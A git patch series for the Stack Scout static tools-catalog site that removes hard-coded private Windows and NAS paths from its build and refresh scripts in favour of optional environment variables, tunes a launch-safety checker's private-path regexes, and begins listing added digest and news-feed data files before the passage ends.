From 58db4564cbe828d691e7a0955febc4b3d759b4e7 Mon Sep 17 00:00:00 2001 From: Kol Tregaskes Date: Thu, 4 Jun 2026 05:31:21 +0100 Subject: [PATCH 1/5] fix: remove Stack Scout local path coupling --- .env.example | 5 ++++ .gitignore | 2 ++ README.md | 10 ++++---- catalog/index.html | 2 +- categories/apis/index.html | 2 +- categories/clis/index.html | 2 +- categories/desktop-apps/index.html | 2 +- categories/index.html | 2 +- categories/mcps/index.html | 2 +- categories/web-apps/index.html | 2 +- categories/web-services/index.html | 2 +- categories/websites/index.html | 2 +- collections/index.html | 2 +- data/categories-manifest.json | 4 +-- data/collections-manifest.json | 4 +-- data/methodology-manifest.json | 4 +-- data/page-registry.json | 2 +- data/radar-manifest.json | 4 +-- data/tools-manifest.json | 4 +-- data/updates-manifest.json | 4 +-- index.html | 2 +- method/index.html | 2 +- radar/index.html | 2 +- scripts/build-stackscout.js | 24 +++++++----------- scripts/refresh-stackscout.ps1 | 40 ++++++++++++++++-------------- service-worker.js | 2 +- tools/anthropic-api/index.html | 2 +- tools/canvas-planner/index.html | 2 +- tools/gh-cli/index.html | 2 +- tools/github-mcp-server/index.html | 2 +- tools/hugging-face/index.html | 2 +- tools/make/index.html | 2 +- tools/n8n/index.html | 2 +- tools/openai-api/index.html | 2 +- tools/perplexity/index.html | 2 +- tools/playwright-mcp/index.html | 2 +- tools/signal-stack/index.html | 2 +- tools/strudel-studio/index.html | 2 +- tools/syncpad/index.html | 2 +- tools/wrangler/index.html | 2 +- updates/index.html | 2 +- 41 files changed, 84 insertions(+), 81 deletions(-) create mode 100644 .env.example diff --git a/.env.example b/.env.example new file mode 100644 index 0000000..4096273 --- /dev/null +++ b/.env.example @@ -0,0 +1,5 @@ +# Optional local-only export targets. +# Leave unset in public CI and ordinary GitHub Pages builds. 
+STACKSCOUT_PRIVATE_EXPORT_DIR= +STACKSCOUT_PRIVATE_EXPORT_FILE= +STACKSCOUT_PRIVATE_STATUS_DIR= diff --git a/.gitignore b/.gitignore index 4bfa471..2a5cba6 100644 --- a/.gitignore +++ b/.gitignore @@ -10,6 +10,8 @@ planning-local/ .local-notes/ # Local screenshots and scratch files +.serve.log +.serve.err.log tmp-*.png tmp-*.jpg tmp-*.jpeg diff --git a/README.md b/README.md index 4a807b4..37303ba 100644 --- a/README.md +++ b/README.md @@ -2,12 +2,12 @@ `stackscout` builds **Stack Scout**, the public-facing tools destination for curated builder tools, services, APIs, MCPs, and CLIs. -This repo remains the GitHub Pages implementation base, but the visible product is no longer a simple internal "Tools Hub" brochure. The private operational console stays separate in `W:\Repos\_local\surfaces\tools-hub-local`. +This repo remains the GitHub Pages implementation base, but the visible product is no longer a simple internal "Tools Hub" brochure. The private operational console stays outside this public repo. ## Public vs private - This repo is public-facing only. -- The local launcher, manager inbox, review evidence, session state, and leak-check operations belong in `tools-hub-local`. +- Local launchers, operations state, and review artefacts belong in the private local surface, not this repo. - Public content must stay safe for GitHub Pages and public browsing. - Do not rely on `.gitignore` alone to protect private data. Public output is generated from an allowlisted shared source layer. 
@@ -23,7 +23,7 @@ These source files drive: - public manifests in `data/` - generated static pages across the public site -- a private preview export written to `W:\Repos\_local\surfaces\tools-hub-local\data\stackscout-publishing.json` +- an optional private preview export when `STACKSCOUT_PRIVATE_EXPORT_DIR` or `STACKSCOUT_PRIVATE_EXPORT_FILE` is set locally ## Build @@ -68,9 +68,9 @@ Before a public refresh, bump `CACHE_NAME` in `service-worker.js` when generated npm run refresh:site ``` -This runs the site build, runs checks, and writes private refresh status to `W:\Repos\_local\surfaces\tools-hub-local\data\stackscout-refresh-status.json`. +This runs the site build, runs checks, and optionally writes private refresh status when `STACKSCOUT_PRIVATE_STATUS_DIR` is set locally. -For unattended Windows refreshes without visible terminal focus theft, use the local-only launcher at `W:\Repos\_My Tools\LOCAL-ONLY\stackscout-refresh\run-stackscout-refresh.cmd`. +For unattended Windows refreshes without visible terminal focus theft, use a local-only launcher outside this public repo and set the optional private export/status environment variables there. ## Site structure diff --git a/catalog/index.html b/catalog/index.html index 5c4a8e6..6afa345 100644 --- a/catalog/index.html +++ b/catalog/index.html @@ -676,7 +676,7 @@

SyncPad

diff --git a/categories/apis/index.html b/categories/apis/index.html index 145d11d..4175a4c 100644 --- a/categories/apis/index.html +++ b/categories/apis/index.html @@ -175,7 +175,7 @@

Anthropic API

diff --git a/categories/clis/index.html b/categories/clis/index.html index c1f4070..81b6211 100644 --- a/categories/clis/index.html +++ b/categories/clis/index.html @@ -175,7 +175,7 @@

Wrangler

diff --git a/categories/desktop-apps/index.html b/categories/desktop-apps/index.html index 5391e8e..c98a026 100644 --- a/categories/desktop-apps/index.html +++ b/categories/desktop-apps/index.html @@ -141,7 +141,7 @@

SyncPad

diff --git a/categories/index.html b/categories/index.html index 70bbb47..c9acbbd 100644 --- a/categories/index.html +++ b/categories/index.html @@ -228,7 +228,7 @@

Desktop Apps

diff --git a/categories/mcps/index.html b/categories/mcps/index.html index 8a410de..f862d74 100644 --- a/categories/mcps/index.html +++ b/categories/mcps/index.html @@ -175,7 +175,7 @@

Playwright MCP

diff --git a/categories/web-apps/index.html b/categories/web-apps/index.html index a756d06..cb3bc04 100644 --- a/categories/web-apps/index.html +++ b/categories/web-apps/index.html @@ -209,7 +209,7 @@

Strudel Studio

diff --git a/categories/web-services/index.html b/categories/web-services/index.html index 56ff97d..cf70f1a 100644 --- a/categories/web-services/index.html +++ b/categories/web-services/index.html @@ -175,7 +175,7 @@

Make

diff --git a/categories/websites/index.html b/categories/websites/index.html index 2107b21..999627d 100644 --- a/categories/websites/index.html +++ b/categories/websites/index.html @@ -175,7 +175,7 @@

Hugging Face

diff --git a/collections/index.html b/collections/index.html index c4ad6eb..ae64571 100644 --- a/collections/index.html +++ b/collections/index.html @@ -175,7 +175,7 @@

From the Stack Scout Lab

diff --git a/data/categories-manifest.json b/data/categories-manifest.json index dc7e493..78826b4 100644 --- a/data/categories-manifest.json +++ b/data/categories-manifest.json @@ -1,7 +1,7 @@ { "title": "Stack Scout // Categories", - "generatedAt": "2026-05-25", - "updatedAt": "2026-05-25", + "generatedAt": "2026-06-04", + "updatedAt": "2026-06-04", "categories": [ { "slug": "websites", diff --git a/data/collections-manifest.json b/data/collections-manifest.json index 0e6d713..c6f8013 100644 --- a/data/collections-manifest.json +++ b/data/collections-manifest.json @@ -1,7 +1,7 @@ { "title": "Stack Scout // Collections", - "generatedAt": "2026-05-25", - "updatedAt": "2026-05-25", + "generatedAt": "2026-06-04", + "updatedAt": "2026-06-04", "collections": [ { "slug": "creator-stack", diff --git a/data/methodology-manifest.json b/data/methodology-manifest.json index 5cf7354..f57652d 100644 --- a/data/methodology-manifest.json +++ b/data/methodology-manifest.json @@ -1,7 +1,7 @@ { "title": "Stack Scout // Methodology", - "generatedAt": "2026-05-25", - "updatedAt": "2026-05-25", + "generatedAt": "2026-06-04", + "updatedAt": "2026-06-04", "thesis": "Stack Scout is a public guide, not a benchmark lab. 
We badge selectively, update from official sources where possible, and avoid pretending every fast-moving tool deserves a fixed numeric score.", "principles": [ { diff --git a/data/page-registry.json b/data/page-registry.json index e4ba728..33a29ae 100644 --- a/data/page-registry.json +++ b/data/page-registry.json @@ -1,6 +1,6 @@ { "title": "Stack Scout // Page Registry", - "generatedAt": "2026-05-25", + "generatedAt": "2026-06-04", "pages": [ { "key": "home", diff --git a/data/radar-manifest.json b/data/radar-manifest.json index 2c299ca..7d7a77b 100644 --- a/data/radar-manifest.json +++ b/data/radar-manifest.json @@ -1,7 +1,7 @@ { "title": "Stack Scout // Radar", - "generatedAt": "2026-05-25", - "updatedAt": "2026-05-25", + "generatedAt": "2026-06-04", + "updatedAt": "2026-06-04", "items": [ { "title": "Azure MCP Server", diff --git a/data/tools-manifest.json b/data/tools-manifest.json index 28fa7b6..dee2917 100644 --- a/data/tools-manifest.json +++ b/data/tools-manifest.json @@ -1,7 +1,7 @@ { "title": "Stack Scout // Tools Manifest", - "generatedAt": "2026-05-25", - "updatedAt": "2026-05-25", + "generatedAt": "2026-06-04", + "updatedAt": "2026-06-04", "summary": "Public-safe catalog for Stack Scout.", "counts": { "total": 14, diff --git a/data/updates-manifest.json b/data/updates-manifest.json index 4ae33c6..779cf1b 100644 --- a/data/updates-manifest.json +++ b/data/updates-manifest.json @@ -1,7 +1,7 @@ { "title": "Stack Scout // Updates", - "generatedAt": "2026-05-25", - "updatedAt": "2026-05-25", + "generatedAt": "2026-06-04", + "updatedAt": "2026-06-04", "summary": "Public-safe activity stream seeded from official or first-party sources.", "items": [ { diff --git a/index.html b/index.html index ccc9d71..ec7781b 100644 --- a/index.html +++ b/index.html @@ -833,7 +833,7 @@

From the Stack Scout Lab

diff --git a/method/index.html b/method/index.html index 8b44939..aa83e0d 100644 --- a/method/index.html +++ b/method/index.html @@ -201,7 +201,7 @@

Verdict language

diff --git a/radar/index.html b/radar/index.html index aad5067..4bc907f 100644 --- a/radar/index.html +++ b/radar/index.html @@ -164,7 +164,7 @@

GitHub skills ecosystem

diff --git a/scripts/build-stackscout.js b/scripts/build-stackscout.js index 250398c..d390a74 100644 --- a/scripts/build-stackscout.js +++ b/scripts/build-stackscout.js @@ -4,10 +4,6 @@ const path = require('path') const ROOT_DIR = path.resolve(__dirname, '..') const SOURCE_DIR = path.join(ROOT_DIR, 'content', 'stackscout') const DATA_DIR = path.join(ROOT_DIR, 'data') -const PRIVATE_PREVIEW_EXPORT_CANDIDATES = [ - 'W:\\Repos\\_local\\surfaces\\tools-hub-local\\data\\stackscout-publishing.json', - '\\\\nas_storage_1\\Workspaces\\Repos\\_local\\surfaces\\tools-hub-local\\data\\stackscout-publishing.json', -] const BUILD_NOW = new Date() const GENERATED_AT = BUILD_NOW.toISOString().slice(0, 10) const GENERATED_AT_ISO = BUILD_NOW.toISOString() @@ -54,17 +50,16 @@ function writeExternalJson(absolutePath, value) { fs.writeFileSync(absolutePath, `${JSON.stringify(value, null, 2)}\n`, 'utf8') } -function resolveWritableExternalPath(candidates) { - for (const candidate of candidates) { - try { - ensureParent(candidate) - return candidate - } catch (error) { - continue - } +function resolvePrivatePreviewExportPath() { + if (process.env.STACKSCOUT_PRIVATE_EXPORT_FILE) { + return path.resolve(process.env.STACKSCOUT_PRIVATE_EXPORT_FILE) } - throw new Error(`Unable to resolve writable external path from candidates: ${candidates.join(', ')}`) + if (process.env.STACKSCOUT_PRIVATE_EXPORT_DIR) { + return path.join(path.resolve(process.env.STACKSCOUT_PRIVATE_EXPORT_DIR), 'stackscout-publishing.json') + } + + return null } function escapeHtml(value) { @@ -1279,8 +1274,7 @@ ${routes.map((route) => ` ${PUBLIC_BASE_URL}${route}`).jo } function main() { - const privatePreviewExport = - process.platform === 'win32' ? 
resolveWritableExternalPath(PRIVATE_PREVIEW_EXPORT_CANDIDATES) : null + const privatePreviewExport = resolvePrivatePreviewExportPath() const site = readJson('site-source.json') const tools = readJson('tools-source.json') const updates = readJson('updates-source.json').sort((a, b) => b.publishedAt.localeCompare(a.publishedAt)) diff --git a/scripts/refresh-stackscout.ps1 b/scripts/refresh-stackscout.ps1 index fe3be49..cc072d6 100644 --- a/scripts/refresh-stackscout.ps1 +++ b/scripts/refresh-stackscout.ps1 @@ -6,29 +6,24 @@ param( $ErrorActionPreference = 'Stop' $repoRoot = (Resolve-Path (Join-Path $PSScriptRoot '..')).Path -$privateDataDirCandidates = @( - 'W:\Repos\_local\surfaces\tools-hub-local\data', - '\\nas_storage_1\Workspaces\Repos\_local\surfaces\tools-hub-local\data' -) -$privateDataDir = $null -foreach ($candidate in $privateDataDirCandidates) { - try { - if (-not (Test-Path $candidate)) { - New-Item -ItemType Directory -Path $candidate -Force | Out-Null - } +$privateDataDirInput = if ($env:STACKSCOUT_PRIVATE_STATUS_DIR) { + $env:STACKSCOUT_PRIVATE_STATUS_DIR +} elseif ($env:STACKSCOUT_PRIVATE_EXPORT_DIR) { + $env:STACKSCOUT_PRIVATE_EXPORT_DIR +} else { + $null +} - $privateDataDir = (Resolve-Path $candidate).Path - break - } catch { - continue +$privateDataDir = $null +if ($privateDataDirInput) { + if (-not (Test-Path $privateDataDirInput)) { + New-Item -ItemType Directory -Path $privateDataDirInput -Force | Out-Null } -} -if (-not $privateDataDir) { - throw 'Unable to resolve a writable private data directory for Stack Scout refresh status.' 
+ $privateDataDir = (Resolve-Path $privateDataDirInput).Path } -$statusFile = Join-Path $privateDataDir 'stackscout-refresh-status.json' +$statusFile = if ($privateDataDir) { Join-Path $privateDataDir 'stackscout-refresh-status.json' } else { $null } $toolsManifestFile = Join-Path $repoRoot 'data\tools-manifest.json' $updatesManifestFile = Join-Path $repoRoot 'data\updates-manifest.json' $categoriesManifestFile = Join-Path $repoRoot 'data\categories-manifest.json' @@ -38,10 +33,13 @@ $durationStopwatch = [System.Diagnostics.Stopwatch]::StartNew() function Read-JsonFile { param( - [Parameter(Mandatory = $true)] [string]$Path ) + if (-not $Path) { + return $null + } + if (-not (Test-Path $Path)) { return $null } @@ -82,6 +80,10 @@ function Write-RefreshStatus { $payload[$entry.Key] = $entry.Value } + if (-not $statusFile) { + return + } + $directory = Split-Path -Parent $statusFile if (-not (Test-Path $directory)) { New-Item -ItemType Directory -Path $directory -Force | Out-Null diff --git a/service-worker.js b/service-worker.js index bcf97f5..9ff0fb2 100644 --- a/service-worker.js +++ b/service-worker.js @@ -1,4 +1,4 @@ -const CACHE_NAME = 'stackscout-2026-05-25' +const CACHE_NAME = 'stackscout-2026-06-04' const APP_SHELL = [ '', 'index.html', diff --git a/tools/anthropic-api/index.html b/tools/anthropic-api/index.html index 00f4859..9274b4a 100644 --- a/tools/anthropic-api/index.html +++ b/tools/anthropic-api/index.html @@ -311,7 +311,7 @@

n8n

diff --git a/tools/canvas-planner/index.html b/tools/canvas-planner/index.html index 30981ec..a333ebe 100644 --- a/tools/canvas-planner/index.html +++ b/tools/canvas-planner/index.html @@ -277,7 +277,7 @@

SyncPad

diff --git a/tools/gh-cli/index.html b/tools/gh-cli/index.html index 4ce2c98..3206296 100644 --- a/tools/gh-cli/index.html +++ b/tools/gh-cli/index.html @@ -277,7 +277,7 @@

Wrangler

diff --git a/tools/github-mcp-server/index.html b/tools/github-mcp-server/index.html index 9729a00..cedcfb4 100644 --- a/tools/github-mcp-server/index.html +++ b/tools/github-mcp-server/index.html @@ -311,7 +311,7 @@

Wrangler

diff --git a/tools/hugging-face/index.html b/tools/hugging-face/index.html index 5cec48b..8e6dee2 100644 --- a/tools/hugging-face/index.html +++ b/tools/hugging-face/index.html @@ -311,7 +311,7 @@

GitHub MCP Server

diff --git a/tools/make/index.html b/tools/make/index.html index b6ee64d..cb9981e 100644 --- a/tools/make/index.html +++ b/tools/make/index.html @@ -311,7 +311,7 @@

Anthropic API

diff --git a/tools/n8n/index.html b/tools/n8n/index.html index 6bf8067..2b209f0 100644 --- a/tools/n8n/index.html +++ b/tools/n8n/index.html @@ -311,7 +311,7 @@

Anthropic API

diff --git a/tools/openai-api/index.html b/tools/openai-api/index.html index e4b7c25..b5b70ae 100644 --- a/tools/openai-api/index.html +++ b/tools/openai-api/index.html @@ -345,7 +345,7 @@

Playwright MCP

diff --git a/tools/perplexity/index.html b/tools/perplexity/index.html index 56142c2..226bd85 100644 --- a/tools/perplexity/index.html +++ b/tools/perplexity/index.html @@ -277,7 +277,7 @@

OpenAI API

diff --git a/tools/playwright-mcp/index.html b/tools/playwright-mcp/index.html index 525d96f..d2b6b07 100644 --- a/tools/playwright-mcp/index.html +++ b/tools/playwright-mcp/index.html @@ -311,7 +311,7 @@

Anthropic API

diff --git a/tools/signal-stack/index.html b/tools/signal-stack/index.html index 890b1a4..df9fb37 100644 --- a/tools/signal-stack/index.html +++ b/tools/signal-stack/index.html @@ -255,7 +255,7 @@

Strudel Studio

diff --git a/tools/strudel-studio/index.html b/tools/strudel-studio/index.html index e3f09bb..dbd10d1 100644 --- a/tools/strudel-studio/index.html +++ b/tools/strudel-studio/index.html @@ -277,7 +277,7 @@

OpenAI API

diff --git a/tools/syncpad/index.html b/tools/syncpad/index.html index 8506e6e..a5b9964 100644 --- a/tools/syncpad/index.html +++ b/tools/syncpad/index.html @@ -221,7 +221,7 @@

Canvas Planner

diff --git a/tools/wrangler/index.html b/tools/wrangler/index.html index 6f22718..2bf1dc5 100644 --- a/tools/wrangler/index.html +++ b/tools/wrangler/index.html @@ -277,7 +277,7 @@

Playwright MCP

diff --git a/updates/index.html b/updates/index.html index fdc4b3e..a824e2d 100644 --- a/updates/index.html +++ b/updates/index.html @@ -364,7 +364,7 @@

Wrangler 4.58.0 improved command grouping and auth ergonomics

From 3ffb111f68891cc42a443077a0356795a85c2422 Mon Sep 17 00:00:00 2001 From: Kol Tregaskes Date: Sat, 6 Jun 2026 13:33:29 +0100 Subject: [PATCH 2/5] fix: narrow launch-safety private path checks --- scripts/verify-launch-safety.js | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/scripts/verify-launch-safety.js b/scripts/verify-launch-safety.js index 282dedd..e7a3b97 100644 --- a/scripts/verify-launch-safety.js +++ b/scripts/verify-launch-safety.js @@ -45,9 +45,10 @@ const REQUIRED_PUBLIC_FILES = [ ] const TEXT_EXTENSIONS = new Set(['.css', '.html', '.js', '.json', '.svg', '.txt', '.xml']) const PRIVATE_PATTERNS = [ - { label: 'Windows drive path', pattern: /\b[A-Z]:[\\/][^\s"'<>)]*/i }, - { label: 'UNC path', pattern: /\\\\[A-Za-z0-9._-]+[\\/][^\s"'<>)]*/i }, - { label: 'local-only surface marker', pattern: /\b(?:tools-hub-local|LOCAL-ONLY|_local)\b/i }, + { label: 'Kol Windows user path', pattern: /\b[A-Z]:[\\/]Users[\\/](?:koltregaskes|kolin)[\\/][^\s"'<>)]*/i }, + { label: 'W drive estate path', pattern: /\bW:[\\/][^\s"'<>)]*/i }, + { label: 'estate UNC path', pattern: /\\\\(?:\?\\)?(?:nas_storage_1|MINI-PC|localhost|127\.0\.0\.1)[\\/][^\s"'<>)]*/i }, + { label: 'local-only surface marker', pattern: /\b(?:tools-hub-local|LOCAL-ONLY|_local)\b/ }, { label: 'private operations wording', pattern: /\b(?:manager inbox|review evidence|session state)\b/i }, ] const REQUIRED_GITIGNORE_PATTERNS = ['.env', '.env.*', '*.local.md', '.local/', 'local-hub/'] From 52fed771d49f5337a14e3256f26d97ce92a0243b Mon Sep 17 00:00:00 2001 From: Kol Tregaskes Date: Sat, 6 Jun 2026 13:40:59 +0100 Subject: [PATCH 3/5] fix: refresh service worker cache during build --- catalog/index.html | 2 +- categories/apis/index.html | 2 +- categories/clis/index.html | 2 +- categories/desktop-apps/index.html | 2 +- categories/index.html | 2 +- categories/mcps/index.html | 2 +- categories/web-apps/index.html | 2 +- categories/web-services/index.html | 2 +- 
categories/websites/index.html | 2 +- collections/index.html | 2 +- data/categories-manifest.json | 4 +- data/collections-manifest.json | 4 +- data/digest-2026-03-15.md | 23 +++ data/digest-2026-03-16.md | 53 ++++++ data/digest-2026-03-17.md | 107 +++++++++++ data/digest-2026-03-18.md | 71 ++++++++ data/digest-2026-03-19.md | 39 ++++ data/digest-2026-03-20.md | 45 +++++ data/digest-2026-03-21.md | 49 +++++ data/digest-2026-03-22.md | 49 +++++ data/digest-2026-03-23.md | 25 +++ data/digest-2026-03-24.md | 65 +++++++ data/digest-2026-03-25.md | 53 ++++++ data/digest-2026-03-26.md | 51 ++++++ data/digest-2026-03-27.md | 35 ++++ data/digest-2026-03-28.md | 29 +++ data/digest-2026-03-29.md | 23 +++ data/digest-2026-03-30.md | 19 ++ data/digest-2026-03-31.md | 125 +++++++++++++ data/digest-2026-04-01.md | 95 ++++++++++ data/digest-2026-04-02.md | 71 ++++++++ data/digest-2026-04-03.md | 47 +++++ data/digest-2026-04-04.md | 39 ++++ data/digest-2026-04-05.md | 125 +++++++++++++ data/digest-2026-04-06.md | 119 ++++++++++++ data/digest-2026-04-07.md | 125 +++++++++++++ data/digest-2026-04-08.md | 125 +++++++++++++ data/digest-2026-04-09.md | 123 +++++++++++++ data/digest-2026-04-10.md | 123 +++++++++++++ data/digest-2026-04-11.md | 125 +++++++++++++ data/digest-2026-04-12.md | 83 +++++++++ data/digest-2026-04-14.md | 125 +++++++++++++ data/digest-2026-04-15.md | 125 +++++++++++++ data/digest-2026-04-16.md | 123 +++++++++++++ data/digest-2026-04-17.md | 123 +++++++++++++ data/digest-2026-04-18.md | 125 +++++++++++++ data/digest-2026-04-19.md | 119 ++++++++++++ data/digest-2026-04-20.md | 123 +++++++++++++ data/digest-2026-04-21.md | 126 +++++++++++++ data/digest-2026-04-22.md | 117 ++++++++++++ data/digest-2026-04-23.md | 103 +++++++++++ data/digest-2026-04-25.md | 125 +++++++++++++ data/digest-2026-04-26.md | 127 +++++++++++++ data/digest-2026-04-27.md | 125 +++++++++++++ data/digest-2026-04-28.md | 123 +++++++++++++ data/digest-2026-04-29.md | 125 +++++++++++++ 
data/digest-2026-04-30.md | 117 ++++++++++++ data/digest-2026-05-01.md | 123 +++++++++++++ data/digest-2026-05-02.md | 125 +++++++++++++ data/digest-2026-05-03.md | 123 +++++++++++++ data/digest-2026-05-04.md | 125 +++++++++++++ data/digest-2026-05-05.md | 125 +++++++++++++ data/digest-2026-05-06.md | 123 +++++++++++++ data/digest-2026-05-07.md | 123 +++++++++++++ data/digest-2026-05-08.md | 125 +++++++++++++ data/digest-2026-05-09.md | 123 +++++++++++++ data/digest-2026-05-10.md | 125 +++++++++++++ data/digest-2026-05-11.md | 123 +++++++++++++ data/digest-2026-05-12.md | 125 +++++++++++++ data/digest-2026-05-13.md | 125 +++++++++++++ data/digest-2026-05-14.md | 125 +++++++++++++ data/digest-2026-05-15.md | 123 +++++++++++++ data/digest-2026-05-16.md | 123 +++++++++++++ data/digest-2026-05-17.md | 125 +++++++++++++ data/digest-2026-05-18.md | 125 +++++++++++++ data/digest-2026-05-19.md | 117 ++++++++++++ data/digest-2026-05-20.md | 107 +++++++++++ data/digest-2026-05-21.md | 119 ++++++++++++ data/digest-2026-05-22.md | 117 ++++++++++++ data/digest-2026-05-23.md | 121 ++++++++++++ data/digest-2026-05-24.md | 125 +++++++++++++ data/digest-2026-05-25.md | 123 +++++++++++++ data/digest-2026-05-26.md | 121 ++++++++++++ data/digest-2026-05-27.md | 123 +++++++++++++ data/digest-2026-05-28.md | 121 ++++++++++++ data/digest-2026-05-29.md | 111 +++++++++++ data/digest-2026-05-30.md | 103 +++++++++++ data/digest-2026-05-31.md | 11 ++ data/digest-2026-06-01.md | 35 ++++ data/digest-2026-06-02.md | 29 +++ data/digest-2026-06-03.md | 41 +++++ data/digest-2026-06-04.md | 35 ++++ data/digest-2026-06-05.md | 35 ++++ data/digest-2026-06-06.md | 5 + data/methodology-manifest.json | 4 +- data/news-feed-2026-03-15.json | 55 ++++++ data/news-feed-2026-03-16.json | 134 ++++++++++++++ data/news-feed-2026-03-17.json | 237 ++++++++++++++++++++++++ data/news-feed-2026-03-18.json | 160 ++++++++++++++++ data/news-feed-2026-03-19.json | 87 +++++++++ data/news-feed-2026-03-20.json | 102 
+++++++++++ data/news-feed-2026-03-21.json | 115 ++++++++++++ data/news-feed-2026-03-22.json | 115 ++++++++++++ data/news-feed-2026-03-23.json | 55 ++++++ data/news-feed-2026-03-24.json | 145 +++++++++++++++ data/news-feed-2026-03-25.json | 115 ++++++++++++ data/news-feed-2026-03-26.json | 119 ++++++++++++ data/news-feed-2026-03-27.json | 87 +++++++++ data/news-feed-2026-03-28.json | 70 +++++++ data/news-feed-2026-03-29.json | 55 ++++++ data/news-feed-2026-03-30.json | 40 ++++ data/news-feed-2026-03-31.json | 271 +++++++++++++++++++++++++++ data/news-feed-2026-04-01.json | 253 ++++++++++++++++++++++++++ data/news-feed-2026-04-02.json | 181 ++++++++++++++++++ data/news-feed-2026-04-03.json | 119 ++++++++++++ data/news-feed-2026-04-04.json | 87 +++++++++ data/news-feed-2026-04-05.json | 261 ++++++++++++++++++++++++++ data/news-feed-2026-04-06.json | 263 +++++++++++++++++++++++++++ data/news-feed-2026-04-07.json | 253 ++++++++++++++++++++++++++ data/news-feed-2026-04-08.json | 269 +++++++++++++++++++++++++++ data/news-feed-2026-04-09.json | 253 ++++++++++++++++++++++++++ data/news-feed-2026-04-10.json | 245 +++++++++++++++++++++++++ data/news-feed-2026-04-11.json | 249 +++++++++++++++++++++++++ data/news-feed-2026-04-12.json | 168 +++++++++++++++++ data/news-feed-2026-04-14.json | 255 ++++++++++++++++++++++++++ data/news-feed-2026-04-15.json | 255 ++++++++++++++++++++++++++ data/news-feed-2026-04-16.json | 259 ++++++++++++++++++++++++++ data/news-feed-2026-04-17.json | 263 +++++++++++++++++++++++++++ data/news-feed-2026-04-18.json | 249 +++++++++++++++++++++++++ data/news-feed-2026-04-19.json | 245 +++++++++++++++++++++++++ data/news-feed-2026-04-20.json | 251 +++++++++++++++++++++++++ data/news-feed-2026-04-21.json | 261 ++++++++++++++++++++++++++ data/news-feed-2026-04-22.json | 247 +++++++++++++++++++++++++ data/news-feed-2026-04-23.json | 207 +++++++++++++++++++++ data/news-feed-2026-04-25.json | 249 +++++++++++++++++++++++++ data/news-feed-2026-04-26.json | 265 
+++++++++++++++++++++++++++ data/news-feed-2026-04-27.json | 263 +++++++++++++++++++++++++++ data/news-feed-2026-04-28.json | 269 +++++++++++++++++++++++++++ data/news-feed-2026-04-29.json | 265 +++++++++++++++++++++++++++ data/news-feed-2026-04-30.json | 255 ++++++++++++++++++++++++++ data/news-feed-2026-05-01.json | 265 +++++++++++++++++++++++++++ data/news-feed-2026-05-02.json | 273 ++++++++++++++++++++++++++++ data/news-feed-2026-05-03.json | 247 +++++++++++++++++++++++++ data/news-feed-2026-05-04.json | 263 +++++++++++++++++++++++++++ data/news-feed-2026-05-05.json | 269 +++++++++++++++++++++++++++ data/news-feed-2026-05-06.json | 263 +++++++++++++++++++++++++++ data/news-feed-2026-05-07.json | 263 +++++++++++++++++++++++++++ data/news-feed-2026-05-08.json | 261 ++++++++++++++++++++++++++ data/news-feed-2026-05-09.json | 257 ++++++++++++++++++++++++++ data/news-feed-2026-05-10.json | 253 ++++++++++++++++++++++++++ data/news-feed-2026-05-11.json | 263 +++++++++++++++++++++++++++ data/news-feed-2026-05-12.json | 259 ++++++++++++++++++++++++++ data/news-feed-2026-05-13.json | 277 ++++++++++++++++++++++++++++ data/news-feed-2026-05-14.json | 277 ++++++++++++++++++++++++++++ data/news-feed-2026-05-15.json | 259 ++++++++++++++++++++++++++ data/news-feed-2026-05-16.json | 275 ++++++++++++++++++++++++++++ data/news-feed-2026-05-17.json | 267 +++++++++++++++++++++++++++ data/news-feed-2026-05-18.json | 273 ++++++++++++++++++++++++++++ data/news-feed-2026-05-19.json | 275 ++++++++++++++++++++++++++++ data/news-feed-2026-05-20.json | 261 ++++++++++++++++++++++++++ data/news-feed-2026-05-21.json | 277 ++++++++++++++++++++++++++++ data/news-feed-2026-05-22.json | 257 ++++++++++++++++++++++++++ data/news-feed-2026-05-23.json | 251 +++++++++++++++++++++++++ data/news-feed-2026-05-24.json | 269 +++++++++++++++++++++++++++ data/news-feed-2026-05-25.json | 279 ++++++++++++++++++++++++++++ data/news-feed-2026-05-26.json | 283 +++++++++++++++++++++++++++++ 
data/news-feed-2026-05-27.json | 265 +++++++++++++++++++++++++++ data/news-feed-2026-05-28.json | 271 +++++++++++++++++++++++++++ data/news-feed-2026-05-29.json | 259 ++++++++++++++++++++++++++ data/news-feed-2026-05-30.json | 243 +++++++++++++++++++++++++ data/news-feed-2026-05-31.json | 25 +++ data/news-feed-2026-06-01.json | 85 +++++++++ data/news-feed-2026-06-02.json | 72 ++++++++ data/news-feed-2026-06-03.json | 102 +++++++++++ data/news-feed-2026-06-04.json | 86 +++++++++ data/news-feed-2026-06-05.json | 84 +++++++++ data/news-feed-2026-06-06.json | 6 + data/news-feed-latest.json | 6 + data/page-registry.json | 2 +- data/radar-manifest.json | 4 +- data/tools-manifest.json | 4 +- data/updates-manifest.json | 4 +- index.html | 2 +- method/index.html | 2 +- radar/index.html | 2 +- scripts/build-stackscout.js | 16 ++ service-worker.js | 2 +- tools/anthropic-api/index.html | 2 +- tools/canvas-planner/index.html | 2 +- tools/gh-cli/index.html | 2 +- tools/github-mcp-server/index.html | 2 +- tools/hugging-face/index.html | 2 +- tools/make/index.html | 2 +- tools/n8n/index.html | 2 +- tools/openai-api/index.html | 2 +- tools/perplexity/index.html | 2 +- tools/playwright-mcp/index.html | 2 +- tools/signal-stack/index.html | 2 +- tools/strudel-studio/index.html | 2 +- tools/syncpad/index.html | 2 +- tools/wrangler/index.html | 2 +- updates/index.html | 2 +- 202 files changed, 24944 insertions(+), 42 deletions(-) create mode 100644 data/digest-2026-03-15.md create mode 100644 data/digest-2026-03-16.md create mode 100644 data/digest-2026-03-17.md create mode 100644 data/digest-2026-03-18.md create mode 100644 data/digest-2026-03-19.md create mode 100644 data/digest-2026-03-20.md create mode 100644 data/digest-2026-03-21.md create mode 100644 data/digest-2026-03-22.md create mode 100644 data/digest-2026-03-23.md create mode 100644 data/digest-2026-03-24.md create mode 100644 data/digest-2026-03-25.md create mode 100644 data/digest-2026-03-26.md create mode 100644 
